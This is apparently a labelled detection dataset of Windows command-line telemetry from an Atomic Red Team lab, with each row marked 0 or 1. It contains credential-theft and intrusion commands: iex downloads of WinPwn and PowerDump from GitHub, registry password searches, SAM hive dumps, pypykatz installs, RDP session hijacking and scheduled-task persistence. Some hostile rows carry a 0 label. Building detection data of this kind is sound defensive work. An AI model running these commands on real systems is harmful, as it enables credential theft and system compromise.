AF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== chcp.com "C:\Windows\system32\chcp.com" 65001
0
cmd.exe "cmd.exe" /c "del /f /q /s %%USERPROFILE%%\T1560.001-data.rar >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
reg.exe unknown C:\Windows\System32\reg.exe query HKCU /f password /t REG_SZ /s cmd.exe C:\Windows\System32\cmd.exe ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\""} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== powershell.exe "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive}
0
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\nircmd.exe win child class Shell_TrayWnd show class TrayClockWClass -erroraction silentlycontinue powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "path=%path%;"C:\Program Files (x86)\winzip" & mkdir .\tmp\victim-files & cd .\tmp\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%ProgramFiles%\WinZip\winzip64.exe" -min -a -s"hello" archive.zip * & dir" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "sc.exe start spooler >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe rundll32.exe "C:\Windows\system32\rundll32.exe" /d acproxy.dll,PerformAutochkOperations
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\s1oh1tyf\s1oh1tyf.cmdline"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args
0
cmd.exe "cmd.exe" /c "path=%%path%%;"C:\Program Files (x86)\winzip" & mkdir .\tmp\victim-files & cd .\tmp\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%%ProgramFiles%%\WinZip\winzip64.exe" -min -a -s"hello" archive.zip * & dir" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /c btool server list general --no-log splunk.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe svchost.exe C:\Windows\System32\svchost.exe -k swprv
0
sc.exe sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" cmd.exe ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\tzsync.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %%temp%%\T1222.001_takeown_folder ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA whoami.exe "C:\Windows\system32\whoami.exe"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %temp%\T1222.001-folder-perms-backup.txt ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe TiWorker.exe C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6250_none_7f16785821e211b6\TiWorker.exe -Embedding
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA cmd.exe "C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %%errorlevel%%"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe SIHClient.exe "C:\Windows\System32\sihclient.exe"
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA powershell.exe "powershell.exe" & {1..10 | %% { rm \""$env:TEMP\SAMvss$_\"" -ErrorAction Ignore }}
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %temp%\T1222.001-folder-perms-backup.txt ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"") {exit 0} else {exit 1}} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== chcp.com "C:\Windows\system32\chcp.com" 65001
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "pip install pypykatz"
0
cmd.exe C:\Windows\System32\cmd.exe /c "takeown.exe /f %temp%\T1222.001_takeown_folder /r" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" & schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "mkdir %%temp%%\T1222.001_cacls & echo T1222.001_cacls1 >> %%temp%%\T1222.001_cacls\T1222.001_cacls1.txt & echo T1222.001_cacls2 >> %%temp%%\T1222.001_cacls\T1222.001_cacls2.txt" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA cmd.exe "C:\Windows\system32\cmd.exe" /c "py -3 -m pip --version >nul 2>&1 && exit /b %%errorlevel%%"
0
cmd.exe "cmd.exe" /c "net.exe stop spooler" powershell.exe ar-win-dc.attackrange.local
1
reg.exe reg.exe reg query HKLM /f password /t REG_SZ /s cmd.exe "cmd.exe" /c "reg query HKLM /f password /t REG_SZ /s & reg query HKCU /f password /t REG_SZ /s" ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "cmd.exe" /c "pip install pypykatz" pip.exe pip install pypykatz
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\fgvu1b3y\fgvu1b3y.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES826B.tmp" "c:\Users\Administrator\AppData\Local\Temp\fgvu1b3y\CSC10AB12E1C66445FA965BE323398433A0.TMP"
0
cmd.exe cmd.exe /c "reg.exe save hklm\sam C:\Users\ADMINI~1\AppData\Local\Temp\bswdowwkvja" WinCreds.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "icacls C:\Users\Public\* /save %temp%\T1222.001-folder-perms-backup.txt /t /q >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
README.md exists but content is empty. Use the Edit dataset card button to edit it.
Downloads last month
1
Edit dataset card